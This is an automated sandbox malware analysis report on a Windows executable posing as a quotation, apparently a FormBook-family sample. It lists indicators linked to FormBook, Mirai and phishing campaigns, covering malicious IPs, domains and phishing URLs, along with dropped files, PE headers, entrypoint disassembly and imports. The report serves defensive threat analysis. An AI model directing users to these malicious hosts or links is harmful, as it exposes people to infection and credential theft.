Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.

Simulations

Behavior and APIs

Time	Type	Description
02:30:28	API Interceptor	29822704x Sleep call for process: cmdkey.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
160.25.166.123	z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe	Get hash	malicious	FormBook	Browse	www.rpa.asia/ggyo/
13.248.169.48	ORDER REF 47896798 PSMCO.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.londonatnight.coffee/13to/
	236236236.elf	Get hash	malicious	Unknown	Browse	portlandbeauty.com/
	profroma invoice.exe	Get hash	malicious	FormBook	Browse	www.aktmarket.xyz/wb7v/
	SC_TR11670000_pdf.exe	Get hash	malicious	FormBook	Browse	www.xphone.net/i7vz/
	RFQ_P.O.1212024.scr	Get hash	malicious	FormBook	Browse	www.krshop.shop/5p01/
	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	sharewood.xyz/administrator/index.php
	MA-DS-2024-03 URGENT.exe	Get hash	malicious	FormBook	Browse	www.snyp.shop/4nyz/
	Recibos.exe	Get hash	malicious	FormBook	Browse	www.egyshare.xyz/lp5b/
	AWB_5771388044 Documente de expediere.exe	Get hash	malicious	FormBook	Browse	www.avalanchefi.xyz/ctta/
	AWB_5771388044 Documente de expediere.exe	Get hash	malicious	FormBook	Browse	www.avalanchefi.xyz/ctta/
103.106.67.112	rQuotation.exe	Get hash	malicious	FormBook	Browse	www.furrcali.xyz/3dtl/?4v7=WTzrGLrFoDOf3MfqMggnB2yODJjw2W6R3d7AI4DzdlPnCYzv+YsvzCma/KjEqV7kmJXwzvABskUepNotbm90GG8Ab8L4vbMqXlBd8atmujJl3TdcKhvlJPk=&pRel=chN0
	PO 1202495088.exe	Get hash	malicious	FormBook	Browse	www.furrcali.xyz/86f0/
	Viridine84.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.sailforever.xyz/p4rk/
	Doc 784-01965670.exe	Get hash	malicious	FormBook	Browse	www.sailforever.xyz/hshp/
	BL.exe	Get hash	malicious	FormBook	Browse	www.sailforever.xyz/hshp/
	BILL OF LADDING.exe	Get hash	malicious	FormBook	Browse	www.sailforever.xyz/hshp/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.rpa.asia	z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe	Get hash	malicious	FormBook	Browse	160.25.166.123
www.milp.store	PO-000172483 pdf.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	194.9.94.85
	new.exe	Get hash	malicious	FormBook	Browse	194.9.94.86
	PO 1202495088.exe	Get hash	malicious	FormBook	Browse	194.9.94.86
www.mirenzhibo.net	rQuotation.exe	Get hash	malicious	FormBook	Browse	202.95.11.110
www.mirenzhibo.net	z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe	Get hash	malicious	FormBook	Browse	202.95.11.110
www.mzkd6gp5.top	CJE003889.exe	Get hash	malicious	FormBook	Browse	172.67.158.81
www.bonheur.tech	PO 1202495088.exe	Get hash	malicious	FormBook	Browse	76.223.54.146
www.ogbos88.cyou	rHP_SCAN_DOCUME.exe	Get hash	malicious	FormBook	Browse	104.21.13.141
www.furrcali.xyz	rQuotation.exe	Get hash	malicious	FormBook	Browse	103.106.67.112
www.furrcali.xyz	PO 1202495088.exe	Get hash	malicious	FormBook	Browse	103.106.67.112

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
GIGAINFRASoftbankBBCorpJP	5.elf	Get hash	malicious	Unknown	Browse	171.2.26.236
	6.elf	Get hash	malicious	Unknown	Browse	220.38.176.232
	6.elf	Get hash	malicious	Unknown	Browse	126.126.55.244
	3.elf	Get hash	malicious	Unknown	Browse	157.103.108.160
	arm7.elf	Get hash	malicious	Mirai, Moobot	Browse	123.230.33.166
	arm.elf	Get hash	malicious	Mirai, Moobot	Browse	221.51.193.17
	6.elf	Get hash	malicious	Unknown	Browse	220.8.167.167
	miori.ppc.elf	Get hash	malicious	Unknown	Browse	221.85.111.46
	miori.x86.elf	Get hash	malicious	Unknown	Browse	219.13.174.104
	miori.sh4.elf	Get hash	malicious	Unknown	Browse	220.49.136.74
AMAZON-02US	ssl.elf	Get hash	malicious	Gafgyt	Browse	54.171.230.55
	ssd.elf	Get hash	malicious	Gafgyt	Browse	34.243.160.129
	http://join.grass-io.cc	Get hash	malicious	Unknown	Browse	76.223.55.101
	2.elf	Get hash	malicious	Unknown	Browse	54.171.230.55
	mips.elf	Get hash	malicious	Mirai	Browse	54.171.230.55
	12.elf	Get hash	malicious	Unknown	Browse	54.171.230.55
	https://rinderynitvye.blogspot.com/	Get hash	malicious	CAPTCHA Scam ClickFix, Phisher	Browse	18.245.31.129
	https://mail.voipmessage.uk/XZmNVMGRWSjAyR3hxcDF0LzhSdGt1ZFZjdG0vUU9uWWRDQXI2eXJwbnNYd0FnNE9TWjhBNncyakhQSlRKa0poSEVkY09KRzlaVG9SSGM4NSt2bHh3M0h4eHpwKzZNZlpMUU9rWklrRlg2R0R3ak9qbVA4T21TZXpzYUxJazlsaVo0ODNubmNtS1ZuQTdWL1dLa3kvZVpKeU5WOUJWUVRFMHcxRWhsODJKQTdVV2NSUmloaFBtRWdiL1lGQ0VCOTNUUjVmSE1nPT0tLVpvYUVQQVVmdkNSZmR3ZUItLWhoMjNyU1ZFSWhzclZVc0cwdTEwS0E9PQ==?cid=305193241	Get hash	malicious	KnowBe4	Browse	52.51.195.94
	http://indyhumane.org	Get hash	malicious	Unknown	Browse	52.208.198.158
	https://click.pstmrk.it/3s/click.pstmrk.it%2F3s%2Fclick.pstmrk.it%252F3s%252Fclick.pstmrk.it%25252F3s%25252F8fi5.veracidep.ru%2525252F9rQQ7pYZ%2525252F%25252FGnrm%25252FJIy6AQ%25252FAQ%25252Fc8a642e1-b752-489d-a606-2e0c28c9f43c%25252F1%25252Fp3ItI-koyL%252FGnrm%252FJYy6AQ%252FAQ%252F96a81154-bc5a-4dec-811a-9ad4ee762256%252F1%252FydnKIiaQi0%2FGnrm%2FJoy6AQ%2FAQ%2F9c58c880-73af-4c48-9b37-4983856d006d%2F1%2FdSmT7Kur-Y/Gnrm/J4y6AQ/AQ/dd03067b-b850-464f-b99d-a4582f20c822/1/nPxHYVfVwy#bWF5cmFAYnVpbGRpbmdiYWNrdG9nZXRoZXIub3Jn	Get hash	malicious	HTMLPhisher	Browse	34.248.248.118
VOYAGERNET-AS-APVoyagerInternetLtdNZ	5.elf	Get hash	malicious	Unknown	Browse	202.154.140.238
	rQuotation.exe	Get hash	malicious	FormBook	Browse	103.106.67.112
	PO 1202495088.exe	Get hash	malicious	FormBook	Browse	103.106.67.112
	na.elf	Get hash	malicious	Unknown	Browse	202.154.136.19
	sora.mips.elf	Get hash	malicious	Mirai	Browse	202.154.140.249
	loligang.mips-20241128-1536.elf	Get hash	malicious	Mirai	Browse	114.23.255.61
	Viridine84.exe	Get hash	malicious	FormBook, GuLoader	Browse	103.106.67.112
	sh4.elf	Get hash	malicious	Mirai	Browse	111.65.234.249
	la.bot.m68k.elf	Get hash	malicious	Unknown	Browse	114.23.128.23
	la.bot.sparc.elf	Get hash	malicious	Unknown	Browse	111.65.234.209

Process:	C:\Windows\SysWOW64\cmdkey.exe
File Type:	SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	135168
Entropy (8bit):	1.1142956103012707
Encrypted:	false
SSDEEP:	192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6kvjd:8t4n/9p/39J6hwNKRmqu+7VusEtrd
MD5:	E3F9717F45BF5FFD0A761794A10A5BB5
SHA1:	EBD823E350F725F29A7DE7971CD35D8C9A5616CC
SHA-256:	D79535761C01E8372CCEB75F382E912990929624EEA5D7093A5A566BAE069C70
SHA-512:	F12D2C7B70E898ABEFA35FEBBDC28D264FCA071D66106AC83F8FC58F40578387858F364C838E69FE8FC66645190E1CB2B4B63791DDF77955A1C376424611A85D
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\obtenebrate

Download File

Process:	C:\Users\user\Desktop\QUOTATION#050125.exe
File Type:	data
Category:	dropped
Size (bytes):	288256
Entropy (8bit):	7.995112572219139
Encrypted:	true
SSDEEP:	6144:7WVzS/t9XRSWIodlzadU9ICSAnLnIIawW4M2NfNTN/ww:U2/BSWjdlzZfLra5iD7
MD5:	820C2703F7A66DE84F8E9E6BE0480EAE
SHA1:	6C972FCDAE22BBD82DC30199BE038B7DF0DB8A00
SHA-256:	DAA27B3C8603F7B9165348FA8275488612327F29EDF787E8A78EE1CDEBF0F690
SHA-512:	73A07D2BFD8244299BAE52A280096F7DB49D2E22FEFBDB6095970C6651213E717A70CFB00CDF0C2A5D8FCE736A31278F1725EC957CB9B29F43FD4F542821851C
Malicious:	false
Reputation:	low
Preview:	~m.X4RDE^RG5.RT.N913E7I.L37OX7RDEZRG53IRTFN913E7IKL37OX7RDE.RG5=V.ZF.0...6..mg_&+."6= &X.3:(!M.Q .;>".^!xs..e7=#P.D_^bN913E7I2M:.r8P.y%=.zUT.H...QT.-...W(.-..f2 .a 1<{.^.3E7IKL37..7R.D[R-.`.RTFN913E.IIM86DX7.@EZRG53IRT.[913U7IK<77OXwRDUZRG73ITTFN913E1IKL37OX7"@EZPG53IRTDNy.3E'IK\37OX'RDUZRG53IBTFN913E7IKL37OX7RDEZRG53IRTFN913E7IKL37OX7RDEZRG53IRTFN913E7IKL37OX7RDEZRG53IRTFN913E7IKL37OX7RDEZRG53IRTFN913E7IKL37OX7RDEZRG53IRTh:\IGE7I..77OH7RD.^RG%3IRTFN913E7IKL.7O87RDEZRG53IRTFN913E7IKL37OX7RDEZRG53IRTFN913E7IKL37OX7RDEZRG53IRTFN913E7IKL37OX7RDEZRG53IRTFN913E7IKL37OX7RDEZRG53IRTFN913E7IKL37OX7RDEZRG53IRTFN913E7IKL37OX7RDEZRG53IRTFN913E7IKL37OX7RDEZRG53IRTFN913E7IKL37OX7RDEZRG53IRTFN913E7IKL37OX7RDEZRG53IRTFN913E7IKL37OX7RDEZRG53IRTFN913E7IKL37OX7RDEZRG53IRTFN913E7IKL37OX7RDEZRG53IRTFN913E7IKL37OX7RDEZRG53IRTFN913E7IKL37OX7RDEZRG53IRTFN913E7IKL37OX7RDEZRG53IRTFN913E7IKL37OX7RDEZRG53IRTFN913E7IKL37OX7RDEZRG53IRTFN913E7IKL37OX7RDEZRG53IRTFN913E7IKL37OX7RDEZRG53IRTFN913E7IKL37OX7RDEZRG5

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.4252412328478306
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	QUOTATION#050125.exe
File size:	1'747'456 bytes
MD5:	824144ca67ee2cea4ae60d3c2367785d
SHA1:	55b1d429a2941c13863553372391c6d6f8bbf374
SHA256:	0fccb2e8cc5af7ebd69241df3855983165849d4c0e30629b5e52054bf4dd0ba1
SHA512:	cc47fd6fa8228a0b3e7e65a3e21ce1f0f2c66a07a88423415fd8c901c7a2321139ea562b62a0cc4214090fdb57ec021b9d0fd4afbd86a6909760e9a5df820cd5
SSDEEP:	49152:XTvC/MTQYxsWR7a8H3N5MSDC5AKBVExjP+4D:jjTQYxsWRddivjVExS
TLSH:	3A85E0023381C062FF9B95330BA6F6159BBC6D260527E51F13A82DB9BE705B1163E763
File Content Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

File Icon


Icon Hash:	333333ab693b9b98

Static PE Info

General

Entrypoint:	0x420577
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x677CCD78 [Tue Jan 7 06:45:12 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	948cc502fe9226992dce9417f952fce3

Entrypoint Preview

Instruction
call 00007F8C6D024B83h
jmp 00007F8C6D02448Fh
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F8C6D02466Dh
mov dword ptr [esi], 0049FDF0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FDF8h
mov dword ptr [ecx], 0049FDF0h
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F8C6D02463Ah
mov dword ptr [esi], 0049FE0Ch
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FE14h
mov dword ptr [ecx], 0049FE0Ch
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
and dword ptr [eax], 00000000h
and dword ptr [eax+04h], 00000000h
push eax
mov eax, dword ptr [ebp+08h]
add eax, 04h
push eax
call 00007F8C6D02722Dh
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 0049FDD0h
push eax
call 00007F8C6D027278h
pop ecx
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
push eax
call 00007F8C6D027261h
test byte ptr [ebp+08h], 00000001h
pop ecx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc8e64	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xd4000	0xd3ec4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1a8000	0x7594	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xb0ff0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xc3400	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb1010	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9c000	0x894	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9ab1d	0x9ac00	0a1473f3064dcbc32ef93c5c8a90f3a6	False	0.565500681542811	data	6.668273581389308	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x9c000	0x2fb82	0x2fc00	c9cf2468b60bf4f80f136ed54b3989fb	False	0.35289185209424084	data	5.691811547483722	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xcc000	0x706c	0x4800	53b9025d545d65e23295e30afdbd16d9	False	0.04356553819444445	DOS executable (block device driver @\273\)	0.5846666986982398	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xd4000	0xd3ec4	0xd4000	d41b7581b1de85c3371aba1c52618990	False	0.9281074955778302	data	7.899458842541689	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x1a8000	0x7594	0x7600	c68ee8931a32d45eb82dc450ee40efc3	False	0.7628111758474576	data	6.7972128181359786	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xd4548	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xd4670	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xd4798	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xd48c0	0x10d8b	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	Great Britain	0.9989130907351854
RT_ICON	0xe564c	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536	English	Great Britain	0.42335561339169525
RT_ICON	0xf5e74	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384	English	Great Britain	0.5058455361360416
RT_ICON	0xfa09c	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	English	Great Britain	0.5346473029045643
RT_ICON	0xfc644	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	English	Great Britain	0.6055347091932458
RT_ICON	0xfd6ec	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	English	Great Britain	0.7225177304964538
RT_MENU	0xfdb54	0x50	data	English	Great Britain	0.9
RT_STRING	0xfdba4	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xfe138	0x68a	data	English	Great Britain	0.2735961768219833
RT_STRING	0xfe7c4	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xfec54	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xff250	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xff8ac	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xffd14	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xffe6c	0xa7af4	data			1.0003144855540478
RT_GROUP_ICON	0x1a7960	0x5a	Targa image data - Map 32 x 3467 x 1 +1	English	Great Britain	0.7888888888888889
RT_GROUP_ICON	0x1a79bc	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x1a79d0	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x1a79e4	0x14	data	English	Great Britain	1.25
RT_VERSION	0x1a79f8	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x1a7ad4	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll	HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll	DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll	GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
GDI32.dll	EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll	DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
